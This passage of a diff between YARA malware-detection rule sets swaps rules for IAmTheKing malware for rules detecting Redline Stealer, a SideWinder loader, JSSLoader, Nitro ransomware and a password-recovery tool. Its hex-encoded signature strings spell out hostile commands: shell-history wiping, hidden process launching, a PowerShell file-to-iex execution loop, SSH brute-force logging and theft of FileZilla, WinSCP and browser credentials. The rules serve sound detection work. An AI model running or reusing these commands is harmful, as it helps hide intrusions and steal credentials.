-		$s11 = "ExtServiceDelete" fullword ascii
+		$s1 = { 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 43 68 65 63 6b 20 49 50 28 25 73 29 20 77 69 74 68 20 53 53 48 20 70 6f 72 74 20 69 73 20 6f 70 65 6e 2e 2e 2e }
+		$s2 = { 63 61 74 20 2f 64 65 76 2f 6e 75 6c 6c 20 3e 20 7e 2f 2e 62 61 73 68 5f 68 69 73 74 6f 72 79 20 26 26 20 68 69 73 74 6f 72 79 20 2d 63 }
+		$s3 = { 6e 6f 68 75 70 20 2e 2f 25 73 20 26 3e 20 6d 79 73 71 6c 6c 6f 67 73 20 26 }
+		$s4 = { 72 6d 20 2d 66 20 25 73 20 6d 79 73 71 6c 6c 6f 67 73 }
+		$s5 = { 63 6f 6d 6d 61 6e 64 20 2d 76 20 62 61 73 68 }
+		$s6 = { 53 74 6f 70 20 62 72 75 74 65 20 6f 6e 2c 20 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 54 72 79 3a 20 49 50 3a 20 25 73 2c 20 63 72 65 64 65 6e 74 69 61 6c 3a 20 25 73 2f 25 73 20 28 25 64 2f 25 64 29 3a 20 44 55 52 41 54 49 4f 4e 3a 20 25 66 }
+		$s7 = { 57 6f 72 6b 65 72 3a 20 28 25 64 29 2c 20 54 72 79 3a 20 49 50 3a 20 25 73 2c 20 63 72 65 64 65 6e 74 69 61 6c 3a 20 25 73 2f 25 73 20 28 25 64 2f 25 64 29 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20KB and 8 of ( $s* )
+		uint32( 0 ) == 0x464c457f and filesize > 900KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Queenofclubs_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_Mal_Stealer_NET_Redline_Aug_2020_1 : FILE
 {
 	meta:
-		description = "Detect QueenOfClubs malware"
+		description = "Detect Redline Stealer (August 2020)"
 		author = "Arkbird_SOLG"
-		id = "d78df760-5753-528c-b03d-7bb91ec658c0"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_QueenOfClubs_Jul_2021_1.yara#L1-L21"
+		id = "6fda87c3-0d00-5c00-a1ff-6d96dd726ddf"
+		date = "2020-08-24"
+		modified = "2020-08-24"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1297878628450152448"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-24/Redline/Mal_Stealer_NET_Redline_Aug_2020_1.yar#L1-L31"
 		license_url = "N/A"
-		logic_hash = "c6fe9dd24098ef3c281d9e6727613499988c88b9d2011af77390e0ce358bebf4"
+		logic_hash = "950641dfaf17f332e6a18961aebb2533732d82ce69f3617efa08cc63272f1786"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "b0a1da4fc5526365df495094f65660d88487ce5e60192e5fb4075e815f9481d3"
-		tlp = "White"
-		adversary = "IAmTheKing"
+		hash1 = "4195430d95ac1ede9bc986728fc4211a1e000a9ba05a3e968dd302c36ab0aca0"
 
 	strings:
-		$s1 = { 66 00 6f 00 72 00 28 00 3b 00 3b 00 29 00 7b 00 24 00 53 00 3d 00 47 00 65 00 74 00 2d 00 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 20 00 22 00 25 00 73 00 22 00 3b 00 49 00 46 00 28 00 24 00 53 00 29 00 7b 00 22 00 22 00 20 00 3e 00 20 00 22 00 25 00 73 00 22 00 3b 00 24 00 74 00 3d 00 69 00 65 00 78 00 20 00 24 00 53 00 20 00 32 00 3e 00 22 00 25 00 73 00 22 00 3b 00 24 00 74 00 3d 00 24 00 74 00 2b 00 27 00 20 00 27 00 3b 00 65 00 63 00 68 00 6f 00 20 00 24 00 74 00 20 00 3e 00 3e 00 22 00 25 00 73 00 22 00 3b 00 7d 00 73 00 6c 00 65 00 65 00 70 00 20 00 2d 00 6d 00 20 00 36 00 30 00 30 00 3b 00 7d }
-		$s2 = { 50 00 6f 00 77 00 65 00 72 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 20 00 2d 00 6e 00 6f 00 70 00 20 00 2d 00 63 00 20 00 25 00 73 }
-		$s3 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e }
-		$s4 = { 5c 00 7e 00 74 00 6d 00 70 00 5f 00 [6-20] ( 00 2e 00 6a 00 70 00 67 | 00 2e 00 70 00 73 00 31) }
-		$s5 = { c7 45 d8 ac 89 41 00 c7 45 dc 00 00 00 00 6a 01 68 00 00 40 04 8d 55 d8 52 68 c8 89 41 00 68 e0 89 41 00 8b 45 c0 83 c0 08 50 68 ec 89 41 00 8b 4d f4 51 ff 15 78 62 41 00 8b 55 c0 89 42 04 8b 45 c0 83 78 04 00 75 19 8b 4d f0 51 ff 15 74 62 41 00 8b 55 f4 52 ff 15 74 62 41 00 e9 14 ff ff ff 68 3c 04 00 00 e8 b7 70 00 00 83 c4 04 89 45 d0 8b 45 d0 89 45 e0 68 ec 01 00 00 e8 a1 70 00 00 83 c4 04 89 45 cc 8b 4d cc 89 4d d4 8b 55 c0 8b 32 b9 7b 00 00 00 8b 7d d4 f3 a5 6a 01 8b 45 c0 83 c0 1c 50 68 ec 01 00 00 8b 4d d4 51 68 c1 f5 09 00 8b 55 c0 83 c2 20 52 e8 04 ef ff ff }
-		$s6 = "http://bot.google.com" fullword ascii
-		$s7 = { 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 00 00 25 00 73 00 00 00 00 00 25 00 73 }
+		$s1 = { 53 00 45 00 4c 00 45 00 43 00 54 00 20 00 2a 00 20 00 46 00 52 00 4f 00 4d 00 20 00 57 00 69 00 6e 00 33 00 32 00 5f 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 20 00 57 00 68 00 65 00 72 00 65 00 20 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 49 00 64 00 3d 00 27 00 7b 00 30 00 7d }
+		$s2 = { 28 00 28 00 28 00 28 00 5b 00 30 00 2d 00 39 00 2e 00 5d 00 29 00 5c 00 64 00 29 00 2b 00 29 00 7b 00 31 00 7d 00 29 }
+		$s3 = { 7b 00 30 00 7d 00 5c 00 46 00 69 00 6c 00 65 00 5a 00 69 00 6c 00 6c 00 61 00 5c 00 72 00 65 00 63 00 65 00 6e 00 74 00 73 00 65 00 72 00 76 00 65 00 72 00 73 00 2e 00 78 00 6d 00 6c }
+		$s4 = { 7b 00 30 00 7d 00 5c 00 46 00 69 00 6c 00 65 00 5a 00 69 00 6c 00 6c 00 61 00 5c 00 73 00 69 00 74 00 65 00 6d 00 61 00 6e 00 61 00 67 00 65 00 72 00 2e 00 78 00 6d 00 6c }
+		$s5 = { 53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 4d 00 61 00 72 00 74 00 69 00 6e 00 20 00 50 00 72 00 69 00 6b 00 72 00 79 00 6c 00 5c 00 57 00 69 00 6e 00 53 00 43 00 50 00 20 00 32 00 5c 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 73 }
+		$s6 = "<encrypted_key>k__BackingField" fullword ascii
+		$s7 = "set_encrypted_key" fullword ascii
+		$s8 = "UserAgentDetector" fullword ascii
+		$s9 = "set_encrypted_key" fullword ascii
+		$s10 = "set_FtpConnections" fullword ascii
+		$s11 = "set_IsProcessElevated" fullword ascii
+		$s12 = "SELECT ExecutablePath, ProcessID FROM Win32_Process" fullword wide
+		$s13 = "<IsProcessElevated>k__BackingField" fullword ascii
+		$s14 = "System.Collections.Generic.IEnumerable<RedLine.Logic.Json.JsonValue>.GetEnumerator" fullword ascii
+		$s15 = "System.Collections.Generic.IEnumerator<RedLine.Logic.Json.JsonValue>.get_Current" fullword ascii
+		$s16 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\browser.exe" fullword wide
+		$s17 = "ProcessExecutablePath" fullword ascii
+		$s18 = "IsProcessElevated" fullword ascii
+		$s19 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\firefox.exe" fullword wide
+		$s20 = "get_encryptedPassword" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 35KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 90KB and 15 of them
 }
-rule ARKBIRD_SOLG_MAL_Kingofhearts_Jul_2021_1 : FILE
+
+rule ARKBIRD_SOLG_APT_Sidewinder_NET_Loader_Aug_2020_1 : FILE
 {
 	meta:
-		description = "Detect KingOfHearts malware"
+		description = "Detected the NET loader used by SideWinder group (August 2020)"
 		author = "Arkbird_SOLG"
-		id = "b1efb4db-3864-5fdc-a3a0-992734eaf22f"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "https://twitter.com/ShadowChasing1/status/1413111641504292864"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_KingOfHearts_Jul_2021_1.yara#L1-L21"
+		id = "7334a3b8-cd56-5820-a073-5bd22076644f"
+		date = "2020-08-24"
+		modified = "2020-08-24"
+		reference = "https://twitter.com/ShadowChasing1/status/1297902086747598852"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-24/SideWinder/APT_SideWinder_NET_Loader_Aug_2020_1.yar#L3-L21"
 		license_url = "N/A"
-		logic_hash = "6761958760997030693c832c75098890b0d6d34fd6fe9c60d68d611497d57419"
+		logic_hash = "b40127cd845d75ef81eb230c12635da00dd77fc53e5886c253a2466627aa8534"
 		score = 75
-		quality = 50
+		quality = 73
 		tags = "FILE"
-		hash1 = "0639e8f5e517c3f57d28bfd9f51cabfb275c64b7bca224656c2ac04f5a8c3af0"
-		hash2 = "0340a90ed4000e579c29f6ad7d4ab2ae1d30f18a2e777689e3e576862efbd6e0"
-		hash3 = "393ccb9853ea7628792e4dd982c2dd52dd8f768fdb7b80b20cbfc2fac4e298a4"
-		tlp = "White"
-		adversary = "IAmTheKing"
+		hash1 = "4a0947dd9148b3d5922651a6221afc510afcb0dfa69d08ee69429c4c75d4c8b4"
 
 	strings:
-		$s1 = { 43 00 72 00 65 00 61 00 74 00 65 00 44 00 6f 00 77 00 6e 00 4c 00 6f 00 61 00 64 00 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 46 00 61 00 69 00 6c 00 65 00 64 00 2c 00 45 00 72 00 72 00 6f 00 72 00 3d 00 25 00 64 }
-		$s2 = { 43 00 72 00 65 00 61 00 74 00 65 00 55 00 70 00 4c 00 6f 00 61 00 64 00 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 }
-		$s3 = "HARDWARE\\DESCRIPTION\\System\\BIOS" fullword ascii
-		$s4 = "\\1-driver-vmsrvc" fullword ascii
-		$s5 = { 73 74 61 72 74 20 64 6f 77 6e 3a 20 25 73 0a }
-		$s6 = { 66 00 69 00 6c 00 65 00 20 00 64 00 65 00 6c 00 65 00 74 00 65 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 20 00 22 00 25 00 73 00 22 }
+		$s1 = "DUSER.dll" fullword wide
+		$s2 = "UHJvZ3JhbQ==" fullword wide
+		$s3 = ".tmp           " fullword wide
+		$s4 = "U3RhcnQ=" fullword wide
+		$s5 = "Gadgets" fullword ascii
+		$s6 = "AdapterInterfaceTemplateObject" fullword ascii
+		$s7 = "FileRipper" fullword ascii
+		$s8 = "copytight @" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 35KB and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 4KB and ( ( pe.exports ( "FileRipper" ) and pe.exports ( "Gadgets" ) ) and 5 of them )
 }
-rule ARKBIRD_SOLG_MAL_Queenofhearts_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Jssloader_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect QueenOfHearts malware"
+		description = "Detect JSSLoader malware"
 		author = "Arkbird_SOLG"
-		id = "763b35dd-6515-5ae8-a539-200a3647f074"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "https://twitter.com/ShadowChasing1/status/1413111641504292864"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_QueenOfHearts_Jul_2021_1.yara#L1-L23"
+		id = "192b1386-f0bc-54e8-9341-84f77f4f07c5"
+		date = "2021-06-04"
+		modified = "2021-06-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-04/FIN7/MAL_JSSLoader_Jun_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "51cb8efddbc635e9a54f58a799e6edcf8eda8ca451ebe85cbce5f6cd20bfb083"
+		logic_hash = "73942afed6b3471be07be1fba3e7f90ec7f2377a1167aeef70627cd07faa3681"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "44eb620879e0c3f80ff95fda5b1e301d471b59e47c4002132df646acfc7cc5ba"
-		hash2 = "a63600e5c28a4c1770a53d310ff017abd3cb9c20cb58a85d53df0c06bcae1864"
-		hash3 = "f110ebee387c2dfac08beb674a8efec20940bc562c5231e9bb4a90296476c29f"
+		hash1 = "59c6acc8f6771ea6eeb8d8f03832642d87f9aa7eb0c3205398d31ad08e019a9c"
+		hash2 = "2609c6ec5d4fdde28d29c272484da66e0995e529cf302ed46f94c68cd99352e3"
+		hash3 = "ea167f5460c5f920699e276fb0c51f32c862256415c57edb4bda5760a70b9e4d"
+		hash4 = "822457c427a0776b41dd8f3479070e56fdd53ccd0175418d4e7d85065ec7d7d1"
 		tlp = "White"
-		adversary = "IAmTheKing"
+		adversary = "FIN7"
 
 	strings:
-		$s1 = "send request error:%d" fullword ascii
-		$s2 = "cookie size :%d" fullword wide
-		$s3 = "querycode error" fullword wide
-		$s4 = { 7b 27 73 65 73 73 69 6f 6e 27 3a 5b 7b 27 6e 61 6d 65 27 3a 27 [1-10] 27 2c 27 69 64 27 3a [1-6] 2c 27 74 69 6d 65 27 3a [3-10] 7d 5d 2c 27 6a 70 67 27 3a }
-		$s5 = "PmMytex%d" fullword wide
-		$s6 = { 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2d 00 4c 00 65 00 6e 00 67 00 74 00 68 00 3a 00 20 00 25 00 49 00 36 00 34 00 75 00 0d 00 0a }
-		$s7 = { 25 00 73 00 5c 00 25 00 73 00 2e 00 6c 00 6f 00 67 }
-		$s8 = { 25 00 73 00 5f 00 25 00 63 00 25 00 63 00 25 00 63 00 25 00 63 00 5f 00 25 00 64 }
+		$s1 = { 8b 45 c8 83 78 0c 00 0f 84 ce 00 00 00 8b 45 c8 8b 4d 08 03 48 0c 8b f4 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 bc 83 7d bc 00 75 05 e9 a7 00 00 00 8b 45 c8 8b 4d 08 03 48 10 89 4d f8 8b 45 c8 8b 4d 08 03 08 89 4d ec 8b 45 ec 3b 45 08 75 06 8b 45 f8 89 45 ec 8b 45 ec 83 38 00 74 6c 8b 45 ec 8b 08 81 e1 00 00 00 }
+		$s2 = { 8b f4 6a 04 68 00 10 00 00 8b 45 c8 8b 4d c8 8b 50 04 2b 11 52 6a 00 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 f8 83 7d f8 00 75 05 e9 a7 00 00 00 8b 45 c8 8b 4d c8 8b 50 04 2b 11 52 8b 45 c8 8b 08 51 8b 55 f8 52 e8 [2] 00 00 83 c4 0c 8b f4 8b 45 f8 50 8b fc ff 15 [3] 00 3b fc e8 [2] 00 00 50 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b f4 6a 04 68 00 10 00 00 68 00 11 00 00 6a 00 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 ec 83 7d ec 00 75 02 eb 3e 8b 45 c8 8b 48 08 8b 11 89 55 e0 83 7d e0 ff 75 0c c7 85 00 ff ff ff 00 00 00 00 eb 09 8b 45 e0 89 85 00 ff ff ff 8b 8d 00 ff ff ff 8b 55 ec 8b 45 f8 89 04 8a 8b 45 ec 64 a3 2c 00 00 00 5f 5e 5b 81 c4 00 01 00 00 3b ec e8 [2] 00 00 8b e5 5d }
+		$s3 = { c7 45 f0 61 00 00 00 c7 45 c8 20 00 00 00 c7 45 cc 88 00 00 00 c7 45 dc 01 00 00 00 8d 45 f0 89 45 d0 33 c0 66 89 45 d4 c7 45 d8 00 00 00 00 c7 45 e0 00 00 00 00 8b 45 08 89 45 e4 8b f4 8d 45 c8 50 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 b0 83 7d b0 ff 74 17 8b f4 8d 45 bc 50 8b 4d b0 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 52 8b cd 50 8d 15 2c 13 40 00 e8 [2] 00 00 58 5a 5f 5e 5b 8b 4d fc 33 cd e8 [2] 00 00 81 c4 2c 01 00 00 3b ec e8 [2] 00 00 8b e5 }
+		$s4 = { 8b 45 ec 8b 08 81 e1 ff ff 00 00 8b f4 51 8b 55 bc 52 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b 4d f8 89 01 eb 25 8b 45 ec 8b 08 8b 55 08 8d 44 0a 02 8b f4 50 8b 4d bc 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b 55 f8 89 02 8b 45 f8 83 c0 04 89 45 f8 8b 45 ec 83 c0 04 89 45 ec eb 8c 8b 45 c8 83 c0 14 89 45 c8 e9 25 ff ff ff 5f 5e 5b 81 c4 08 01 00 00 3b ec e8 [2] 00 00 8b e5 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and filesize < 900KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Powerpool_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Nitro_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect PowerPool malware"
+		description = "Detect Nitro ransomware"
 		author = "Arkbird_SOLG"
-		id = "8248300e-fc3e-56df-be4a-f1850e2bedc8"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_PowerPool_Jul_2021_1.yara#L1-L29"
+		id = "256059b2-1683-5108-8fc8-3cf0b2e7b613"
+		date = "2021-08-12"
+		modified = "2021-08-13"
+		reference = "https://bazaar.abuse.ch/browse/tag/NitroRansomware/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-13/Nitro/RAN_Nitro_Aug_2021_1.yara#L1-L23"
 		license_url = "N/A"
-		logic_hash = "0978a6cd60533ffda0c2b13ea98dc1ba46a464890b895cb2704804a763756fca"
+		logic_hash = "c31267cd9bc6c63db8e32b2a0e7518b0432d62f1de52117b9e903fc3370a1f4d"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		hash1 = "9c08136b26ee5234c61a5d9e5a17afb15da35efc66514d2df5b53178693644c5"
-		hash2 = "23e7e0bbc36d523daa8e3cd8e32618c6c1fb61e32f664756e77d7917b3b11644"
-		hash3 = "e30d32cc40ad19add7dfdcbed960d5f074ea632b796ae975b75eb25455b66bb0"
-		hash4 = "88e7813340194acc4b094fd48ecf665a12d19245b90f2a69dab5861982ca95f6"
-		tlp = "White"
-		adversary = "IAmTheKing"
+		hash1 = "1194aebc9a0016084f6966b07a171e4c62ce1b21580d177a876873641692ee13"
+		hash2 = "6546f0638160cb590b4ead2401fb55d48e10b2ee1808ff0354fff52c9e2f62bf"
+		hash3 = "89dbea1e4b387325f21c784dc72fcf52599f69e1ded27d1b830ff57ae4831559"
+		hash4 = "d8e9561612c6e06160d79abde41c7b66e4921a1c041ad5c2658d43050b4fd2d0"
+		hash5 = "dbed3399932fabe6f7f863403279ac9a6b075aa307dd445df2c7060157d3063b"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$s1 = "write info fail!!! GetLastError-->%u" fullword ascii
-		$s2 = "Set Option failed errcode: %ld" fullword ascii
-		$s3 = { 68 96 00 00 00 68 ?? c4 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 ?? 4f fe ff 59 c3 68 96 00 00 00 68 ?? c5 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 ?? 4f fe ff 59 c3 68 96 00 00 00 68 [2] 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 [2] fe ff 59 c3 83 3d ?? 4c 45 00 00 74 38 53 6a 01 b8 ?? 4c 45 00 e8 ?? a0 fc ff 50 6a 00 b9 ?? 4c 45 00 e8 [2] fb ff 6a ff bb 01 00 00 00 b8 ?? 4c 45 00 e8 [2] fc ff 40 50 b9 ?? 4c 45 00 e8 [2] fb ff 5b 33 c0 6a ff 50 68 ?? 4c 45 00 }
-		$s4 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 }
-		$s5 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 20 62 6f 75 6e 64 61 72 79 3d 2d 2d 4d 55 4c 54 49 2d 50 41 52 54 53 2d 46 4f 52 4d 2d 44 41 54 41 2d 42 4f 55 4e 44 41 52 59 0d 0a }
-		$s6 = { 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 0d 0a 0d 0a }
-		$s7 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 0d 0a }
-		$s8 = { 25 73 3b 74 79 70 65 3d 25 73 3b 6c 65 6e 67 74 68 3d 25 73 3b 72 65 61 6c 64 61 74 61 3d 25 73 65 6e 64 }
+		$s1 = { 1f 1a 28 ?? 00 00 0a [0-2] 72 ?? 14 00 70 28 15 00 00 0a 80 32 00 00 04 28 ?? 00 00 06 7e 32 00 00 04 6f ?? 00 00 0a [0-1] 7e 2f 00 00 04 16 7e 32 00 00 04 7e 30 00 00 04 7e 31 00 00 04 60 28 ?? 00 00 06 26 2a }
+		$s2 = { 02 [0-5] 72 df 00 00 70 28 1b 00 00 }
+		$s3 = { 1f 1a 28 ?? 00 00 0a 0a 1f 1c 28 ?? 00 00 0a 0b 7e 21 00 00 04 06 72 ?? 0c 00 70 28 15 00 00 0a 6f 16 00 00 0a [2] ?? 00 }
+		$s4 = { 7e 4e 00 00 0a 0a [0-1] 72 [2] 00 70 73 ?? 00 00 06 0b [0-1] 07 72 [2] 00 70 6f ?? 00 00 06 [1-3] 8d 7f 00 00 01 25 16 1f 0a 9d 6f ?? 00 00 0a 1c 9a 0a [0-1] de ?? 07 2c ?? 07 6f 42 00 00 0a }
+		$s5 = { 7e 4e 00 00 0a 0a [0-1] 73 ?? 00 00 0a 0b [0-1] 07 72 ?? 14 00 70 6f ?? 00 00 0a [0-2] 6f ?? 00 00 0a 6f ?? 00 00 0a 6f ?? 00 00 0a [0-2] 6f ?? 00 00 0a 0a }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 6 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 25KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Keylogger_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_SP_Vault7_SIG_F_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect a keylogger used by IAmTheKing group"
+		description = "Detect open-source PasswordReminder recovery tools used by Chinese APT in the Past"
 		author = "Arkbird_SOLG"
-		id = "186dc5f5-5cc2-551a-a34c-e775085e7f89"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_Keylogger_Jul_2021_1.yara#L1-L22"
+		id = "0b65e333-16e2-57c3-84f0-5cd24c9d9593"
+		date = "2020-11-30"
+		modified = "2020-11-30"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-30/SP_Vault7_SIG_F_Nov_2020_1.yar#L1-L23"
 		license_url = "N/A"
-		logic_hash = "dfdf5892564b93cd1bf564cfe62e37d9477b5ae0bf20e0f9a44ee97b7e3a99f8"
+		logic_hash = "b03ffb433491b532d891f29aeb5b33c6578067f2f05845514a7bdc1e50f88a10"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-		hash1 = "4c6995cb65ffeac1272d296eb3273b9fbca7f4d603312a5085b5c3be96154915"
-		hash2 = "79d363a163dfb0088545e66404e0213a9e18d5ee66713d7bc906ed97c46b5ca3"
-		tlp = "White"
-		adversary = "IAmTheKing"
+		hash1 = "e6e17f2b2ce0ae07cf48654156b79ee90d330961456f731e84c94f50fe34f802"
+		hash2 = "c224ee5bef42a45e84e0d5a409d8b4c3842b2a7ac3fe5006ee795e64e0778e6e"
 
 	strings:
-		$s1 = "sonme hting is wrong x" fullword ascii
-		$s2 = { 25 73 25 73 25 73 25 73 }
-		$s3 = { 0d 0a 5b 44 41 54 41 5d 3a 0d 0a 00 4c 6f 67 2e 74 78 74 }
-		$s4 = { 0d 0a 5b 54 49 4d 45 3a 5d 25 64 2f 25 64 2f 25 64 20 25 30 32 64 3a 25 30 32 64 3a 25 30 32 64 0d 0a 5b 54 49 54 4c 45 3a 5d }
-		$s5 = { 25 73 2d 25 30 32 64 2d 25 30 32 64 2d 25 30 32 64 2d 25 30 32 64 }
-		$s6 = { 6a 00 56 ff 75 f8 8d 45 e4 50 ff 75 f0 ff 75 f4 ff 75 08 ff 15 c4 80 40 00 8b f0 3b f7 74 12 56 ff 15 70 80 40 00 85 c0 75 1b 56 ff 15 78 }
+		$dbg1 = { 50 61 73 73 77 6f 72 64 52 65 6d 69 6e 64 65 72 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 66 69 6e 64 20 57 69 6e 4c 6f 67 6f 6e 20 6f 72 20 79 6f 75 20 61 72 65 20 75 73 69 6e 67 20 4e 57 47 49 4e 41 2e 44 4c 4c 2e 0a }
+		$dbg2 = { 54 68 65 20 65 6e 63 6f 64 65 64 20 70 61 73 73 77 6f 72 64 20 69 73 20 66 6f 75 6e 64 20 61 74 20 30 78 25 38 2e 38 6c 78 20 61 6e 64 20 68 61 73 20 61 20 6c 65 6e 67 74 68 20 6f 66 20 25 64 2e 0a }
+		$dbg3 = { 50 61 73 73 77 6f 72 64 52 65 6d 69 6e 64 65 72 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 66 69 6e 64 20 74 68 65 20 70 61 73 73 77 6f 72 64 20 69 6e 20 6d 65 6d 6f 72 79 2e 0a }
+		$dbg4 = { 20 55 73 61 67 65 3a 20 25 73 20 44 6f 6d 61 69 6e 4e 61 6d 65 20 55 73 65 72 4e 61 6d 65 20 50 49 44 2d 6f 66 2d 57 69 6e 4c 6f 67 6f 6e 0a 0a }
+		$dbg5 = { 54 68 65 20 6c 6f 67 6f 6e 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 69 73 3a 20 25 53 2f 25 53 2f 25 53 2e 0a }
+		$dbg6 = { 54 68 65 20 57 69 6e 4c 6f 67 6f 6e 20 70 72 6f 63 65 73 73 20 69 64 20 69 73 20 25 64 20 28 30 78 25 38 2e 38 6c 78 29 2e 0a }
+		$dbg7 = { 59 6f 75 20 6c 6f 67 67 65 64 20 6f 6e 20 61 74 20 25 64 2f 25 64 2f 25 64 20 25 64 3a 25 64 3a 25 64 0a }
+		$dbg8 = { 54 68 65 20 68 61 73 68 20 62 79 74 65 20 69 73 3a 20 30 78 25 32 2e 32 78 2e 0a }
+		$dbg9 = { 53 55 56 57 68 14 ?? 40 00 e8 17 0c 00 00 8b 6c 24 1c [1-4] 45 00 50 68 e0 ?? 40 00 e8 ?? ?? 00 00 83 c4 ?? e8 ?? 02 00 00 85 c0 75 1d e8 ?? 02 00 00 85 c0 75 14 68 b4 ?? 40 00 e8 ?? 0b 00 00 83 c4 04 33 c0 5f 5e 5d 5b }
 
 	condition:
